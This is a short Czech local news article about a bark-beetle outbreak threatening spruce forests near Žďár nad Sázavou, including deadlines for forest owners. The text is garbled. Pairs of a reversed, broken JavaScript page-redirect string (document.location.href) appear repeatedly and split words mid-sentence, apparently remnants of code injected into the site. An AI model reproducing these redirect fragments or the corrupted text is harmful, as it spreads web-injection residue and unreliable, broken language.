Rainbow page separator

Žďársku hrozí kůrovcová kalamita, záleží na vlastnících lesů

Úterý, 20. března 2018

Dřevo

Žďár nad Sázavou / Do konce března jsou majitelé lesních porostů povinni dostat ven z lesa či asanovat veškeré stromy a dříví napadené kůrovcem. Nejpozději však před tím, než dospělí brouci vyletí z napadených s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojících stromů či ležícího dříví. Druhým termínem je pak konec května, do kdy musí z lesů zmizet také všechny stromy, které kůrovec stihne napadnout le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos na jaře. V opačném případě smrkovým lesům na Žďársku hrozí kůrovcová kalamita.
„Smrkové porosty jsou vyčerpané již delší dobu trvajícím obdobím zvyšujících se teplot, sucha a nízkou hladinou spodních vod,“ konsta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval vedoucí odboru životného prostředí žďárského městského úřadu Jaroslav Doubek s tím, že za těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to okolností je odolnost dřevin výrazně snížená.
Zatím se rozsáhlá kalamita lesům ve správním obvodu Žďáru nad Sázavou vyhýbala. „Doposud vlastníci lesů na Žďársku byli povětšinou vzorní a většinu napadených stromů zpracovali včas. Těm[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vlastníkům patří poděkování, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože i díky [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu se nám kalamita doposud z velké části vyhýbala. O [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, jestli veškerá snaha nebyla marná, se rozhodne v příštích několika letech,“ doplnil Jaroslav Doubek.